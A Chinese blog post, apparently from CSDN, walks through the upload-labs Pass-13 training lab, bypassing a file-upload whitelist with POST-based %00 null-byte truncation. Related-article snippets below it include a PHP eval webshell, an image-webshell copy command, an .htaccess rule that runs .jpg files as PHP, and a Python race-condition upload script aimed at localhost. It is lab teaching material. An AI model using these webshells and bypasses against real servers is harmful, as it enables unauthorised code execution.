【网络安全】upload-labs Pass-13 解题详析

原创 已于 2025-09-28 16:50:56 修改 · 5.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #upload #文件上传漏洞

于 2023-08-15 09:29:09 首次发布
本文讲解了Antsword在Upload-Labs靶场的实战应用,涉及00截断攻击和解题步骤。后续将探讨XSS-Labs的安全问题。

【精选优质专栏推荐】


每个专栏均配有案例与图文讲解,循序渐进,适合新手与进阶学习者,欢迎订阅。

文章目录

读者可参考、订阅专栏:【Upload-Labs靶场攻防实战】

Antsword蚁剑

该题涉及蚁剑工具的利用,操作可参考:

【网络安全】AntSword(蚁剑)实战解题详析(入门)

【网络安全】DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集

解题过程

后端逻辑代码:

在这里插入图片描述

该题同Pass-12考察00截断,但为POST传参型。

00截断原理参考:【00截断 | upload-labs Pass-12】

抓包:

在这里插入图片描述

改包:

在这里插入图片描述

接着将%00进行URL编码

在这里插入图片描述

如图,变为空字符串:

在这里插入图片描述

放包:

在这里插入图片描述

获得上传路径:

在这里插入图片描述

之后即可进行shell操作,本文不再赘述。

upload-labs靶场通关攻略
qq_54694921的博客
12-19 912
upload-labs靶场通关攻略
文件包含-Uploadlabs-pass13关卡测试
Rnan_prince的博客
07-12 824
图片一句话制作方法 copy 1.png /b + shell.php /a webshell.jpg test13.php: <?php phpinfo(); ?> test1.jpg C:\Users\Rnanprince\Desktop\学习文档>copy test1.jpg/b + test13.php/a webshell.jpg test1.jpg 已复制 1 个文件。 生成文件 : 打开文件末尾有: 上传: 打开 ...
upload-labs pass13
qq_45106794的博客
11-06 583
#upload-labs pass 13 function getReailFileType($filename){ $file = fopen($filename, "rb"); $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); $...
upload-labs pass-13
最新发布
记录自己学习安全知识的笔记, 沉淀ing
10-15 208
这里注意,直接提交是没有作用的,因为POST提交的数据不一致,它还会把我们提交的请求转为十六进制编码提交,我们还需要修改Hex里的内容。我们然后点进旁边的Hex,进行修改。这一关和上一个类似,不过这里是通过POST控制上传路径,我们还是上传一个文件,然后在burp里面改包。找到我们添加的后缀,31,然后在右边的面板中将Code值改为00,然后点击应用就可以了。我们将save_path路径修改一下,后面的1是为了方便定位文件结尾位置。post型00截断,需要再Hex中修改内容。
upload-labs13关~20关细解
Lucky小小吴的小屋
02-13 2211
二次渲染是这一关的最大特点,将上传的文件重新生成为新的文件,这很容易出现“图片马被打乱,重新生成一张普通的jpg文件”四个文件:一句话木马php文件+一张jgp格式照片+包含一句话木马的jpg照片shell_jpg+.py文件。后面,我尝试直接用图片马上传,发现没有二次渲染~~ ,直接用AntSword连接图片马,成功了。后面了解到了,直接将php代码段插入到一个图片里,对于jpg不太显示,jpg不稳定。我发现用普通的图片马+自带的文件包含,就可以实现文件上传漏洞。不行,直接被拦截了,这里会显示一片空白。
upload-labspass-13
羽的博客
07-09 289
$is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); if(in_array($file_ext,$ext_arr)){ ...
upload-labs Pass-13
qq_62673514的博客
02-27 263
upload-labs pass-12通过方法
[网络安全]upload-labs Pass-18 解题_upload-labs18关条件竞争
2401_84972676的博客
05-13 666
创建一个允许上传的文件扩展名数组$ext_arr,包括了允许上传的图片类型(jpg、png、gif)。根据定义的上传路径UPLOAD_PATH和文件名生成待存储的文件路径$upload_file。在移动成功的情况下,使用in_array函数检查文件扩展名是否在允许上传的类型数组中。如果文件扩展名不在允许上传的类型数组中,记录错误信息$msg,并删除已上传的文件。如果有,则开始处理文件上传。如果文件扩展名在允许上传的类型数组中,生成一个随机的文件名。msg为空,来初始化文件上传的状态和错误信息。
[网络安全]upload-labs Pass-14 解题_upload-labs-linux pass14(1)
2401_84972580的博客
05-13 532
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
精选资源
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload-labs靶场Pass-13
wanggonghanfei的博客
10-21 426
upload-labs靶场Pass-13
upload-labs 上传训练
09-02
转自GitHub,是一个文件上传演练的靶场,练习文件上传思路轻松加愉快,附带源码查看,以及提示
[网络安全]upload-labs Pass-17 解题
2401_84972648的博客
05-13 414
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
upload-labs(Pass-10 ~ Pass-13)
m0_64849639的博客
08-17 332
upload-labs
upload-labs】————14、Pass-13
Fly_鹏程万里
08-15 805
闯关界面 前端检测还是后端检测判断 查看源代码: 从代码层面来看应该是检测的文件的幻数,那么我们在文件内容的开头增加幻数就OK: 该文件的利用还需要结合“文件包含”来利用~ ...
upload-labs】————13Pass-12
Fly_鹏程万里
08-15 383
闯关界面 前端检查还是后端检测判断: 查看源码: 采用白名单检查,而且这里的保存路径直接拼接可以使用%00截断来绕过: 浏览器中访问~ ...
upload-labs pass13-19
hclimg的博客
08-02 532
pass-13: 查看提示: 这个只要上传图片码到服务器即可 先绕过文件头检查,添加GIF图片的文件头GIF89a,绕过图片检查 发现上传成功,但是查看图片信息发现被重命名了而且后缀改为了jpg格式的 那么制作图片码上传,将php一句话追加到jpg图片末尾 copy xx.jpg /b + shell.php /a webshell.jpg 用文本打开图片码,在最后发现一句话木马已经被添加...
upload-labs】图片马绕过pass13~16
qq_43665434的博客
03-21 2427
upload-labs】图片马绕过pass13~16 【pass-13】文件头检查绕过 1、源码分 function getReailFileType($filename){ $file = fopen($filename, "rb"); //以字节流的形式打开上传的文件 $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); //unpack()解包
文件上传漏洞-upload靶场13-16关 (图片木马-文件包含与文件上次漏洞
diaobusi的博客
09-03 1455
文件包含漏洞存在于许多服务器端编程语言和框架中。这种漏洞允许攻击者通过利用应用程序未经正确验证的文件包含代码,将恶意文件或远程文件包含到目标应用程序的执行环境中。文件包含漏洞的主要原因在于应用程序在包含文件时未对用户输入进行充分的验证和过滤,或者将用户可控的输入直接用于文件路径或文件名。攻击者可以利用这个漏洞来执行恶意代码、读取敏感文件、绕过访问控制或进行其他非法操作。文件包含漏洞可以分为两种类型:本地文件包含漏洞:攻击者通过指定包含的本地文件路径,从同一服务器上读取和执行文件。
upload-labs pass21
07-20
upload-labs 项目中,Pass-21 的解题思路主要围绕文件上传时的 **MIME 类型验证绕过** 和 **文件名解漏洞利用**。虽然未在提供的引用中直接提及 Pass-21 的具体细节,但根据 upload-labs 系列的常见设计逻辑,Pass-21 很可能涉及以下攻击模式: ### 三级标题:MIME 类型验证绕过 在某些关卡中,服务器会通过检查上传文件的 MIME 类型来阻止非图片文件的上传。攻击者可以通过在上传请求中修改 `Content-Type` 字段来绕过该检查,例如将其设置为 `image/jpeg` 或 `image/png`,即使上传的是 `.php` 文件。这种方式常用于绕过前端或服务器端的简单 MIME 类型检测机制[^1]。 ### 三级标题:双重扩展名上传与解漏洞 服务器端可能使用了不安全的文件名处理方式,例如仅过滤了 `.php` 扩展名,但未对多个扩展名进行处理。攻击者可以尝试上传类似 `shell.php.jpg` 的文件,随后通过某些方式(如 Apache 的解特性)使服务器将 `.php.jpg` 文件当作 PHP 脚本执行。这种攻击方式依赖于服务器配置不当,例如 Apache 的 `mod_php` 模块会解最后一个匹配 `.php` 的扩展名。 ### 三级标题:结合 .htaccess 文件实现解绕过 如果服务器允许上传 `.htaccess` 文件,则攻击者可以上传一个自定义的 `.htaccess` 文件,配置其将特定扩展名(如 `.jpg`)解为 PHP 脚本。例如,添加如下内容: ```apache AddType application/x-httpd-php .jpg ``` 上传后,再上传一个以 `.jpg` 结尾的 PHP 文件,服务器会将其当作 PHP 脚本执行。这种方式常见于 Linux 环境下的 upload-labs 关卡[^3]。 ### 三级标题:条件竞争与多线程上传 在某些情况下,服务器可能对上传后的文件进行异步检查或清理,攻击者可以利用时间差进行条件竞争攻击。通过并发脚本快速上传并访问恶意文件,从而在文件被删除前完成命令执行。例如使用 Python 脚本进行多线程上传和访问: ```python import threading import requests def upload_file(): url = "http://localhost/upload-labs-master/upload.php" files = {'file': ('shell.php', "<?php @eval($_POST['cmd']); ?>", 'image/jpeg')} data = {'submit': 'Upload'} while True: requests.post(url, files=files, data=data) def access_file(): while True: requests.get("http://localhost/upload-labs-master/uploads/shell.php") threads = [] for _ in range(10): t = threading.Thread(target=upload_file) t.start() threads.append(t) for _ in range(2): t = threading.Thread(target=access_file) t.start() threads.append(t) ``` 此脚本通过并发上传和访问,尝试在服务器清理文件前完成攻击过程。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值